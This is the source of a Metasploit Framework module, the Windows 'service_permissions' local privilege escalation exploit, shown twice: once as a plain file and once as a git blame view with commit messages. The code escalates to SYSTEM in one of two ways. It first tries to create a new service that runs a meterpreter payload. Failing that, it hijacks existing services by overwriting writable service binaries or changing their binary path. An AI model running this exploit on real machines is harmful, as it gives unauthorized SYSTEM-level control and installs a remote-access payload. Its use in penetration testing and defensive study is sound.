metasploit-framework/modules/exploits/windows/local/service_permissions.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::Accounts
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Escalate Service Permissions Local Privilege Escalation',
      'Description'   => %q{
        This module attempts to exploit existing administrative privileges to obtain
        a SYSTEM session. If directly creating a service fails, this module will inspect
        existing services to look for insecure file or configuration permissions that may
        be hijacked. It will then attempt to restart the replaced service to run the
        payload. This will result in a new session when this succeeds.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'scriptjunkie' ],
      'Arch'          => [ ARCH_X86 ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'WfsDelay' => '5'
        },
      'Targets'       =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate'=> "Oct 15 2012"
    ))

    register_options([
      OptBool.new("AGGRESSIVE", [ true, "Exploit as many services as possible (dangerous)", false ])
    ])

  end

  def execute_payload_as_new_service(path)
    success = false

    print_status("Trying to add a new service...")
    service_name = Rex::Text.rand_text_alpha((rand(8)+6))
    if service_create(service_name,"",path,startup=2)
      print_status("Created service... #{service_name}")
      write_exe(path, service_name)
      if service_start(service_name) == 0
        print_good("Service should be started! Enjoy your new SYSTEM meterpreter session.")
        success = true
      end

      service_delete(service_name)
    else
      print_status("No privs to create a service...")
      success = false
    end

    return success
  end

  def weak_service_permissions(service_name, service, path)
    success = false
    vprint_status("[#{service_name}] Checking for weak service permissions")

    if service_change_config(service_name, {:bin_path_name => path})
      print_good("[#{service_name}]  has weak configuration permissions - reconfigured to use exe #{path}")
      print_status("[#{service_name}] Restarting service")
      stopped = service_stop(service_name)

      unless (stopped == 2)
        write_exe(path, service_name)
        if (service_start(service_name) == 0)
          print_good("[#{service_name}] Service restarted")
          success = true
        else
          print_error("[#{service_name}] Unable to restart service")
        end
      end

      unless service_change_config(name, {:bin_path_name => service[:path]})
        print_error("[#{service_name}] Failed to reset service to original path #{service[:path]}")
      end
    end

    return success
  end

  def weak_file_permissions(service_name, service, path, token)
    success = false
    vprint_status("[#{service_name}] Checking for weak file permissions")

    #get path to exe; parse out quotes and arguments
    original_path = service[:path]
    possible_path = expand_path(original_path)
    if (possible_path[0] == '"')
      possible_path = possible_path.split('"')[1]
    else
      possible_path = possible_path.split(' ')[0]
    end

    unless file?(possible_path)
      # If we cant determine it manually show the user and let them decide if manual inspection is worthwhile
      print_status("[#{service_name}] Cannot reliably determine path: #{service[:path]}")
    end

    file_permissions = check_dir_perms(possible_path, token)

    if file_permissions && file_permissions.index('W')
      print_good("[#{service_name}] Write access to #{possible_path}")

      begin
        status = service_status(service_name)
        no_access = false
        # Unless service is already stopped
        if status[:state] == SERVICE_STOPPED
          stopped = true
        else
          res = service_stop(service_name)
          stopped = (res != 2)
        end
      rescue RuntimeError => e
        vprint_error("[#{service_name}] #{e} ")
        no_access = true
      end

      if stopped or no_access
        begin
          if move_file(possible_path, possible_path+'.bak')
            write_exe(possible_path, service_name)
            print_status("[#{service_name}]  #{possible_path} moved to #{possible_path+'.bak'} and replaced.")
            if (service_start(service_name) == 0)
              print_good("[#{service_name}] Service restarted")
              success = true
            else
              print_error("Unable to restart service")
            end
          end
        rescue Rex::Post::Meterpreter::RequestError => e
          vprint_error("[#{service_name}] #{e}")
        end
      else
        vprint_error("[#{service_name}] Unable to stop service")
      end
    end

    return success
  end

  # If ServiceType is SERVICE_WIN32_SHARE_PROCESS then we need to
  # define the correct servicename.
  def write_exe(path, service_name=nil)
    vprint_status("[#{service_name}] Writing service executable to #{path}")
    exe = generate_payload_exe_service({:servicename=>service_name})
    write_file(path, exe)
    register_files_for_cleanup(path)
  end

  def exploit
    filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
    tempexe_name = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"

    sysdir = expand_path("%SystemRoot%")
    tmpdir = expand_path("%TEMP%")
    tempexe = tmpdir + "\\" + tempexe_name

    return if execute_payload_as_new_service(tempexe)

    aggressive = datastore['AGGRESSIVE']

    print_status("Trying to find weak permissions in existing services..")

    token = get_imperstoken
    service_list.each do |serv|
      service_name =  serv[:name]
      service = service_info(service_name)
      return if weak_file_permissions(service_name, service, tempexe, token) and not aggressive
      return if weak_service_permissions(service_name, service, tempexe) and not aggressive
    end
  end
end
added exploits/windows/local/service_permissions 2012-10-12 02:42:36 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
added exploits/windows/local/service_permissions 2012-10-12 02:42:36 +00:00			`##`

			`require 'msf/core'`
			`require 'rex'`

			`class Metasploit3 < Msf::Exploit::Local`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = GreatRanking`

Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`include Msf::Post::File`
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Post::Windows::Services`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`include Msf::Post::Windows::Accounts`
			`include Msf::Exploit::EXE`
			`include Msf::Exploit::FileDropper`
Retab modules 2013-08-30 21:28:54 +00:00
			`def initialize(info={})`
			`super( update_info( info,`
			`'Name' => 'Windows Escalate Service Permissions Local Privilege Escalation',`
			`'Description' => %q{`
			`This module attempts to exploit existing administrative privileges to obtain`
			`a SYSTEM session. If directly creating a service fails, this module will inspect`
			`existing services to look for insecure file or configuration permissions that may`
			`be hijacked. It will then attempt to restart the replaced service to run the`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`payload. This will result in a new session when this succeeds.`
Retab modules 2013-08-30 21:28:54 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'scriptjunkie' ],`
			`'Arch' => [ ARCH_X86 ],`
			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`'WfsDelay' => '5'`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Automatic', { } ],`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate'=> "Oct 15 2012"`
			`))`

			`register_options([`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`OptBool.new("AGGRESSIVE", [ true, "Exploit as many services as possible (dangerous)", false ])`
Retab modules 2013-08-30 21:28:54 +00:00			`])`

			`end`

Tidy and constants 2013-12-16 18:35:24 +00:00			`def execute_payload_as_new_service(path)`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`success = false`
Retab modules 2013-08-30 21:28:54 +00:00
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`print_status("Trying to add a new service...")`
			`service_name = Rex::Text.rand_text_alpha((rand(8)+6))`
			`if service_create(service_name,"",path,startup=2)`
			`print_status("Created service... #{service_name}")`
			`write_exe(path, service_name)`
			`if service_start(service_name) == 0`
			`print_good("Service should be started! Enjoy your new SYSTEM meterpreter session.")`
			`success = true`
			`end`
Retab modules 2013-08-30 21:28:54 +00:00
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`service_delete(service_name)`
			`else`
			`print_status("No privs to create a service...")`
			`success = false`
			`end`
Retab modules 2013-08-30 21:28:54 +00:00
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`return success`
			`end`
Retab modules 2013-08-30 21:28:54 +00:00
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`def weak_service_permissions(service_name, service, path)`
			`success = false`
			`vprint_status("[#{service_name}] Checking for weak service permissions")`

			`if service_change_config(service_name, {:bin_path_name => path})`
			`print_good("[#{service_name}] has weak configuration permissions - reconfigured to use exe #{path}")`
			`print_status("[#{service_name}] Restarting service")`
			`stopped = service_stop(service_name)`

			`unless (stopped == 2)`
			`write_exe(path, service_name)`
			`if (service_start(service_name) == 0)`
			`print_good("[#{service_name}] Service restarted")`
			`success = true`
			`else`
			`print_error("[#{service_name}] Unable to restart service")`
			`end`
			`end`
Retab modules 2013-08-30 21:28:54 +00:00
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`unless service_change_config(name, {:bin_path_name => service[:path]})`
			`print_error("[#{service_name}] Failed to reset service to original path #{service[:path]}")`
			`end`
Retab modules 2013-08-30 21:28:54 +00:00			`end`

Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`return success`
			`end`
Retab modules 2013-08-30 21:28:54 +00:00
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`def weak_file_permissions(service_name, service, path, token)`
			`success = false`
			`vprint_status("[#{service_name}] Checking for weak file permissions")`
Retab modules 2013-08-30 21:28:54 +00:00
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`#get path to exe; parse out quotes and arguments`
			`original_path = service[:path]`
			`possible_path = expand_path(original_path)`
			`if (possible_path[0] == '"')`
			`possible_path = possible_path.split('"')[1]`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`possible_path = possible_path.split(' ')[0]`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Unworking refactor of serv_perm 2013-12-15 04:02:11 +00:00
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`unless file?(possible_path)`
			`# If we cant determine it manually show the user and let them decide if manual inspection is worthwhile`
			`print_status("[#{service_name}] Cannot reliably determine path: #{service[:path]}")`
			`end`

			`file_permissions = check_dir_perms(possible_path, token)`

			`if file_permissions && file_permissions.index('W')`
			`print_good("[#{service_name}] Write access to #{possible_path}")`

Retab modules 2013-08-30 21:28:54 +00:00			`begin`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`status = service_status(service_name)`
			`no_access = false`
			`# Unless service is already stopped`
Tidy and constants 2013-12-16 18:35:24 +00:00			`if status[:state] == SERVICE_STOPPED`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`stopped = true`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`res = service_stop(service_name)`
			`stopped = (res != 2)`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`rescue RuntimeError => e`
			`vprint_error("[#{service_name}] #{e} ")`
			`no_access = true`
			`end`
Unworking refactor of serv_perm 2013-12-15 04:02:11 +00:00
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`if stopped or no_access`
			`begin`
			`if move_file(possible_path, possible_path+'.bak')`
			`write_exe(possible_path, service_name)`
			`print_status("[#{service_name}] #{possible_path} moved to #{possible_path+'.bak'} and replaced.")`
			`if (service_start(service_name) == 0)`
			`print_good("[#{service_name}] Service restarted")`
			`success = true`
			`else`
			`print_error("Unable to restart service")`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`end`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`rescue Rex::Post::Meterpreter::RequestError => e`
			`vprint_error("[#{service_name}] #{e}")`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00			`else`
			`vprint_error("[#{service_name}] Unable to stop service")`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`end`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00
			`return success`
			`end`

			`# If ServiceType is SERVICE_WIN32_SHARE_PROCESS then we need to`
			`# define the correct servicename.`
			`def write_exe(path, service_name=nil)`
			`vprint_status("[#{service_name}] Writing service executable to #{path}")`
			`exe = generate_payload_exe_service({:servicename=>service_name})`
			`write_file(path, exe)`
			`register_files_for_cleanup(path)`
			`end`

			`def exploit`
			`filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"`
			`tempexe_name = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"`

			`sysdir = expand_path("%SystemRoot%")`
			`tmpdir = expand_path("%TEMP%")`
			`tempexe = tmpdir + "\\" + tempexe_name`

Tidy and constants 2013-12-16 18:35:24 +00:00			`return if execute_payload_as_new_service(tempexe)`
Large refactor of service_permissions 2013-12-15 18:00:14 +00:00
			`aggressive = datastore['AGGRESSIVE']`

			`print_status("Trying to find weak permissions in existing services..")`

			`token = get_imperstoken`
			`service_list.each do \|serv\|`
			`service_name = serv[:name]`
			`service = service_info(service_name)`
			`return if weak_file_permissions(service_name, service, tempexe, token) and not aggressive`
			`return if weak_service_permissions(service_name, service, tempexe) and not aggressive`
			`end`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
added exploits/windows/local/service_permissions 2012-10-12 02:42:36 +00:00			`end`